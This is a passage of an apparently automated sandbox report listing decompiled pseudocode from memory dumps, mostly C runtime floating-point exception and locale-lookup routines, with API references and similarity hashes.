                    									_v8 = 0;
                    									_v20 = 0;
                    									__eflags = _t349 - 0xffffffff;
                    									if(_t349 != 0xffffffff) {
                    										_t250 = _v16 + 1;
                    										__eflags = _t250;
                    										_v32 = _t250;
                    										_t373 =  &(_t262[_t349 + 1]);
                    										do {
                    											_t253 = E013F3170( *_t373, _t342, _t295, 0);
                    											_v68 = _t303;
                    											_t373 = _t373 - 4;
                    											_v20 = _t262;
                    											_t342 = _t295;
                    											_t303 = 0 + _t253;
                    											asm("adc ecx, 0x0");
                    											_v12 = _t303;
                    											_t34 =  &_v32;
                    											 *_t34 = _v32 - 1;
                    											__eflags =  *_t34;
                    											_v8 = _v12;
                    											_t295 = _v44;
                    										} while ( *_t34 != 0);
                    										_t262 = _a4;
                    									}
                    									_v544 = 0;
                    									_t41 =  &(_t262[1]); // 0x4
                    									_t370 = _t41;
                    									 *_t262 = 0;
                    									E0141394B(_t370, 0x1cc,  &_v540, 0);
                    									_t247 = _v20;
                    									__eflags = 0 - _t247;
                    									 *_t370 = _t342;
                    									_t262[2] = _t247;
                    									asm("sbb ecx, ecx");
                    									__eflags =  ~0x00000000;
                    									 *_t262 = 0xbadbae;
                    									return _v12;
                    								} else {
                    									_t14 =  &(_t262[1]); // 0x4
                    									_t344 = _t14;
                    									_v544 = 0;
                    									 *_t262 = 0;
                    									E0141394B(_t344, 0x1cc,  &_v540, 0);
                    									_t256 = _t262[1];
                    									_t322 = _t256 % _v44;
                    									__eflags = 0 - _t322;
                    									 *_t344 = _t322;
                    									asm("sbb ecx, ecx");
                    									__eflags = 0;
                    									 *_t262 =  ~0x00000000;
                    									return _t256 / _v44;
                    								}
                    							} else {
                    								_t9 =  &(_t262[1]); // 0x4
                    								_v544 = _t198;
                    								 *_t262 = _t198;
                    								E0141394B(_t9, 0x1cc,  &_v540, _t198);
                    								__eflags = 0;
                    								return _t262[1];
                    							}
                    						}
                    					} else {
                    						__eflags = 0;
                    						return 0;
                    					}
                    				} else {
                    					return _t197;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • Opcode ID: a7c3c6b2e0b53cc832c6b9d60aa2e018ed42548eddb90d928b64b7a2ec8cc815
                    • Instruction ID: 57c5e55be92c3a1f34c3da441fd1f6312f0aa70a07adda6e641b83411be6916f
                    • Opcode Fuzzy Hash: a7c3c6b2e0b53cc832c6b9d60aa2e018ed42548eddb90d928b64b7a2ec8cc815
                    • Instruction Fuzzy Hash: E2023E71E001199BDF15CFADC9806AEBBF1FF48724F19416AD919E7391D731AA41CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E014043D9(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                    				signed int _t172;
                    				signed int _t175;
                    				signed int _t178;
                    				signed int* _t179;
                    				signed int _t195;
                    				signed int _t199;
                    				signed int _t202;
                    				void* _t203;
                    				void* _t206;
                    				signed int _t209;
                    				void* _t210;
                    				signed int _t225;
                    				unsigned int* _t240;
                    				signed char _t242;
                    				signed int* _t250;
                    				unsigned int* _t256;
                    				signed int* _t257;
                    				signed char _t259;
                    				long _t262;
                    				signed int* _t265;
                    
                    				 *(_a4 + 4) = 0;
                    				_t262 = 0xc000000d;
                    				 *(_a4 + 8) = 0;
                    				 *(_a4 + 0xc) = 0;
                    				_t242 = _a12;
                    				if((_t242 & 0x00000010) != 0) {
                    					_t262 = 0xc000008f;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                    				}
                    				if((_t242 & 0x00000002) != 0) {
                    					_t262 = 0xc0000093;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                    				}
                    				if((_t242 & 0x00000001) != 0) {
                    					_t262 = 0xc0000091;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                    				}
                    				if((_t242 & 0x00000004) != 0) {
                    					_t262 = 0xc000008e;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                    				}
                    				if((_t242 & 0x00000008) != 0) {
                    					_t262 = 0xc0000090;
                    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                    				}
                    				_t265 = _a8;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                    				_t259 = E0140A7DB(_a4);
                    				if((_t259 & 0x00000001) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                    				}
                    				if((_t259 & 0x00000004) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                    				}
                    				if((_t259 & 0x00000008) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                    				}
                    				if((_t259 & 0x00000010) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                    				}
                    				if((_t259 & 0x00000020) != 0) {
                    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                    				}
                    				_t172 =  *_t265 & 0x00000c00;
                    				if(_t172 == 0) {
                    					 *_a4 =  *_a4 & 0xfffffffc;
                    				} else {
                    					if(_t172 == 0x400) {
                    						_t257 = _a4;
                    						_t225 =  *_t257 & 0xfffffffd | 1;
                    						L26:
                    						 *_t257 = _t225;
                    						L29:
                    						_t175 =  *_t265 & 0x00000300;
                    						if(_t175 == 0) {
                    							_t250 = _a4;
                    							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                    							L35:
                    							 *_t250 = _t178;
                    							L36:
                    							_t179 = _a4;
                    							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                    							if(_a28 == 0) {
                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                    								 *((long long*)(_a4 + 0x10)) =  *_a20;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                    								_t254 = _a4;
                    								_t240 = _a24;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                    								 *(_a4 + 0x50) =  *_t240;
                    							} else {
                    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                    								_t240 = _a24;
                    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                    								 *(_a4 + 0x50) =  *_t240;
                    							}
                    							E0140A741(_t254);
                    							RaiseException(_t262, 0, 1,  &_a4);
                    							_t256 = _a4;
                    							if((_t256[2] & 0x00000010) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffffe;
                    							}
                    							if((_t256[2] & 0x00000008) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffffb;
                    							}
                    							if((_t256[2] & 0x00000004) != 0) {
                    								 *_t265 =  *_t265 & 0xfffffff7;
                    							}
                    							if((_t256[2] & 0x00000002) != 0) {
                    								 *_t265 =  *_t265 & 0xffffffef;
                    							}
                    							if((_t256[2] & 0x00000001) != 0) {
                    								 *_t265 =  *_t265 & 0xffffffdf;
                    							}
                    							_t195 =  *_t256 & 0x00000003;
                    							if(_t195 == 0) {
                    								 *_t265 =  *_t265 & 0xfffff3ff;
                    							} else {
                    								_t206 = _t195 - 1;
                    								if(_t206 == 0) {
                    									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                    									L55:
                    									 *_t265 = _t209;
                    									L58:
                    									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                    									if(_t199 == 0) {
                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                    										L64:
                    										 *_t265 = _t202;
                    										L65:
                    										if(_a28 == 0) {
                    											 *_t240 = _t256[0x14];
                    										} else {
                    											 *_t240 = _t256[0x14];
                    										}
                    										return _t202;
                    									}
                    									_t203 = _t199 - 1;
                    									if(_t203 == 0) {
                    										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                    										goto L64;
                    									}
                    									_t202 = _t203 - 1;
                    									if(_t202 == 0) {
                    										 *_t265 =  *_t265 & 0xfffff3ff;
                    									}
                    									goto L65;
                    								}
                    								_t210 = _t206 - 1;
                    								if(_t210 == 0) {
                    									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                    									goto L55;
                    								}
                    								if(_t210 == 1) {
                    									 *_t265 =  *_t265 | 0x00000c00;
                    								}
                    							}
                    							goto L58;
                    						}
                    						if(_t175 == 0x200) {
                    							_t250 = _a4;
                    							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                    							goto L35;
                    						}
                    						if(_t175 == 0x300) {
                    							 *_a4 =  *_a4 & 0xffffffe3;
                    						}
                    						goto L36;
                    					}
                    					if(_t172 == 0x800) {
                    						_t257 = _a4;
                    						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                    						goto L26;
                    					}
                    					if(_t172 == 0xc00) {
                    						 *_a4 =  *_a4 | 0x00000003;
                    					}
                    				}
                    			}
























                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,000000FF), ref: 01404606
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: eec383fff69a6b4eae612d3ce3d5c6fa2a013b90b2e0813ee94e2fedda35dc2c
                    • Instruction ID: 53830a3a8990beb78dd49abd1f2881695a7dc8fd9e0a34ee19e466a147025446
                    • Opcode Fuzzy Hash: eec383fff69a6b4eae612d3ce3d5c6fa2a013b90b2e0813ee94e2fedda35dc2c
                    • Instruction Fuzzy Hash: 64B13A31510608DFE716CF2DC48AB657BA0FF45364F298669EA99CF2E1C335D992CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E0140FAEE(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t16;
                    				signed int _t22;
                    				void* _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				signed int* _t48;
                    				int _t50;
                    				signed int _t51;
                    
                    				_t16 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t16 ^ _t51;
                    				_t34 = E01406A01(_t33, __ecx, __edx);
                    				_t48 =  *(E01406A01(_t34, __ecx, __edx) + 0x34c);
                    				_t50 = E0140FBC6(_a4);
                    				asm("sbb ecx, ecx");
                    				_t22 = GetLocaleInfoW(_t50, ( ~( *(_t34 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    				if(_t22 != 0) {
                    					_t24 = E0140C591(_t34, _t48, _t50,  *((intOrPtr*)(_t34 + 0x50)),  &_v248);
                    					if(_t24 != 0) {
                    						if( *(_t34 + 0x60) == 0 &&  *((intOrPtr*)(_t34 + 0x5c)) != 0) {
                    							_t31 = E0140C591(_t34, _t48, _t50,  *((intOrPtr*)(_t34 + 0x50)),  &_v248);
                    							if(_t31 == 0) {
                    								_push(_t48);
                    								_push(_t31);
                    								goto L9;
                    							}
                    						}
                    					} else {
                    						if( *(_t34 + 0x60) != _t24) {
                    							L10:
                    							 *_t48 =  *_t48 | 0x00000004;
                    							_t48[1] = _t50;
                    							_t48[2] = _t50;
                    						} else {
                    							_push(_t48);
                    							_push(1);
                    							L9:
                    							_push(_t50);
                    							if(E0140FD1E(_t34) != 0) {
                    								goto L10;
                    							}
                    						}
                    					}
                    					_t28 =  !( *_t48 >> 2) & 0x00000001;
                    				} else {
                    					 *_t48 =  *_t48 & _t22;
                    					_t28 = _t22 + 1;
                    				}
                    				return E013F268B(_t28, _v8 ^ _t51);
                    			}



















                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0140FB42
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: defa8b3fe2b8c7613ecacc26065a6d14f2884b50b4c2226690756e5e5163fbb7
                    • Instruction ID: a13fbc8f5f1f20d013ac4866497c7e45d4ca79fe231640538934ff9c7ad6c294
                    • Opcode Fuzzy Hash: defa8b3fe2b8c7613ecacc26065a6d14f2884b50b4c2226690756e5e5163fbb7
                    • Instruction Fuzzy Hash: D121A4325106079BEB36AA2ADC51BBB77B8EF14310F1001BBED01C6291EB75AD49CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0140F776(void* __ecx, void* __edx, signed int* _a4) {
                    				void* __ebx;
                    				intOrPtr _t26;
                    				intOrPtr _t29;
                    				signed int _t32;
                    				signed char _t33;
                    				signed char _t34;
                    				void* _t36;
                    				intOrPtr* _t39;
                    				intOrPtr* _t42;
                    				signed int _t48;
                    				void* _t51;
                    				void* _t52;
                    				signed int* _t53;
                    				void* _t54;
                    				signed int _t62;
                    
                    				_t54 = E01406A01(_t36, __ecx, __edx);
                    				_t48 = 2;
                    				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                    				_t51 = _t39 + 2;
                    				do {
                    					_t26 =  *_t39;
                    					_t39 = _t39 + _t48;
                    				} while (_t26 != 0);
                    				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                    				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                    				_t52 = _t42 + 2;
                    				do {
                    					_t29 =  *_t42;
                    					_t42 = _t42 + _t48;
                    				} while (_t29 != 0);
                    				_t53 = _a4;
                    				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                    				_t53[1] = 0;
                    				if( *(_t54 + 0x60) == 0) {
                    					_t48 = E0140F872( *((intOrPtr*)(_t54 + 0x50)));
                    				}
                    				 *(_t54 + 0x5c) = _t48;
                    				_t32 = EnumSystemLocalesW(E0140F89E, 1);
                    				_t62 =  *_t53 & 0x00000007;
                    				asm("bt ecx, 0x9");
                    				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                    				asm("bt ecx, 0x8");
                    				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                    				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                    					 *_t53 = 0;
                    					return _t34;
                    				}
                    				return _t34;
                    			}



















                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • EnumSystemLocalesW.KERNEL32(0140F89E,00000001,00000000,?,014050D7,?,0140FECB,00000000,?,?,?), ref: 0140F7E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: c38ee0523ec875d022e4e97b589686000d1a0353e4d44dfd86cfa467e6a3147e
                    • Instruction ID: 3602d379683ba7882f0c2a1bfbaf05fc292ab28e966986e1468b4fda4b24404a
                    • Opcode Fuzzy Hash: c38ee0523ec875d022e4e97b589686000d1a0353e4d44dfd86cfa467e6a3147e
                    • Instruction Fuzzy Hash: 531129376007015FDB299F3AC8905BAB791FF80358B15443ED94687B90D371B946CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0140FD1E(void* __ebx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				void* __ecx;
                    				void* _t8;
                    				void* _t12;
                    				intOrPtr _t13;
                    				void* _t16;
                    				void* _t20;
                    				void* _t22;
                    				void* _t24;
                    				signed int _t27;
                    				intOrPtr* _t29;
                    
                    				_push(_t16);
                    				_t8 = E01406A01(__ebx, _t16, _t22);
                    				_t27 = _a4;
                    				_t24 = _t8;
                    				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                    					if(_t27 == _v8 || _a8 == 0) {
                    						L7:
                    						_t12 = 1;
                    					} else {
                    						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                    						_t20 = _t29 + 2;
                    						do {
                    							_t13 =  *_t29;
                    							_t29 = _t29 + 2;
                    						} while (_t13 != 0);
                    						if(E0140F872( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                    							goto L1;
                    						} else {
                    							goto L7;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t12 = 0;
                    				}
                    				return _t12;
                    			}















                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0140FB99,00000000,00000000,?), ref: 0140FD4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 91bffdf229385e5ed7a09b3d879186acf3dde07d5754ab6bb65f847041bedf07
                    • Instruction ID: 1b928e34724bc6ab36353bde0818b18284da6f45e624a33a6bf53da868cc1ed9
                    • Opcode Fuzzy Hash: 91bffdf229385e5ed7a09b3d879186acf3dde07d5754ab6bb65f847041bedf07
                    • Instruction Fuzzy Hash: 6FF0F936500116ABEB366A6BCC05BBB7B68EF40764F15447ADD16A32E0EA30FD47C6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0140F682(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t11;
                    				signed int _t17;
                    				void* _t26;
                    				void* _t27;
                    				signed int* _t40;
                    				int _t42;
                    				signed int _t43;
                    
                    				_t11 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t11 ^ _t43;
                    				_t27 = E01406A01(_t26, __ecx, __edx);
                    				_t40 =  *(E01406A01(_t27, __ecx, __edx) + 0x34c);
                    				_t42 = E0140FBC6(_a4);
                    				asm("sbb ecx, ecx");
                    				_t17 = GetLocaleInfoW(_t42, ( ~( *(_t27 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
                    				if(_t17 != 0) {
                    					if(E0140C591(_t27, _t40, _t42,  *((intOrPtr*)(_t27 + 0x54)),  &_v248) == 0 && E0140FCFA(_t42) != 0) {
                    						 *_t40 =  *_t40 | 0x00000004;
                    						_t40[2] = _t42;
                    						_t40[1] = _t42;
                    					}
                    					_t23 =  !( *_t40 >> 2) & 0x00000001;
                    				} else {
                    					 *_t40 =  *_t40 & _t17;
                    					_t23 = _t17 + 1;
                    				}
                    				return E013F268B(_t23, _v8 ^ _t43);
                    			}

















                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A60
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,014050DE,00000000,014051FE), ref: 0140F6D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: a3a470958a9e504b90101e9418bf4b68f04aa3edf9ea2c0125ccf3030319b8be
                    • Instruction ID: 519f17cc103f0d271665cd763ceb60c109628246063e4549bf9c8e06bb8b91bb
                    • Opcode Fuzzy Hash: a3a470958a9e504b90101e9418bf4b68f04aa3edf9ea2c0125ccf3030319b8be
                    • Instruction Fuzzy Hash: 96F0F432651106ABDB25AA7ADC44EFA33ACDB55310F0141BEE906DB290EA34AD058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140F811(void* __ecx, void* __edx, signed char* _a4) {
                    				void* __ebx;
                    				intOrPtr _t11;
                    				signed int _t13;
                    				signed char* _t15;
                    				void* _t17;
                    				intOrPtr* _t20;
                    				intOrPtr _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t27 = E01406A01(_t17, __ecx, __edx);
                    				_t25 = 2;
                    				_t20 =  *((intOrPtr*)(_t27 + 0x50));
                    				_t26 = _t20 + 2;
                    				do {
                    					_t11 =  *_t20;
                    					_t20 = _t20 + _t25;
                    				} while (_t11 != 0);
                    				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
                    				 *(_t27 + 0x60) = _t13;
                    				if(_t13 == 0) {
                    					_t25 = E0140F872( *((intOrPtr*)(_t27 + 0x50)));
                    				}
                    				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
                    				EnumSystemLocalesW(E0140FAEE, 1);
                    				_t15 = _a4;
                    				if(( *_t15 & 0x00000004) == 0) {
                    					 *_t15 = 0;
                    					return _t15;
                    				}
                    				return _t15;
                    			}

                    APIs
                      • Part of subcall function 01406A01: GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                      • Part of subcall function 01406A01: _free.LIBCMT ref: 01406A38
                      • Part of subcall function 01406A01: SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                      • Part of subcall function 01406A01: _abort.LIBCMT ref: 01406A7F
                    • EnumSystemLocalesW.KERNEL32(0140FAEE,00000001,?,?,014050D7,?,0140FE8F,014050D7,?,?,?,?,?,014050D7,?,?), ref: 0140F85D
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 7fcc1a64ba91cc3d5c45359384e2e2e9965c9e45ddade8f9f4590ea7f21dde43
                    • Instruction ID: f1fc93c41c31407f5b489e6a618f20207055ea0cbc44dcd74327817157ae5800
                    • Opcode Fuzzy Hash: 7fcc1a64ba91cc3d5c45359384e2e2e9965c9e45ddade8f9f4590ea7f21dde43
                    • Instruction Fuzzy Hash: BFF0C2373003055FDB366E7B9880AAB7B95EF81768B15843EE9058B6A0D771A9458A40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
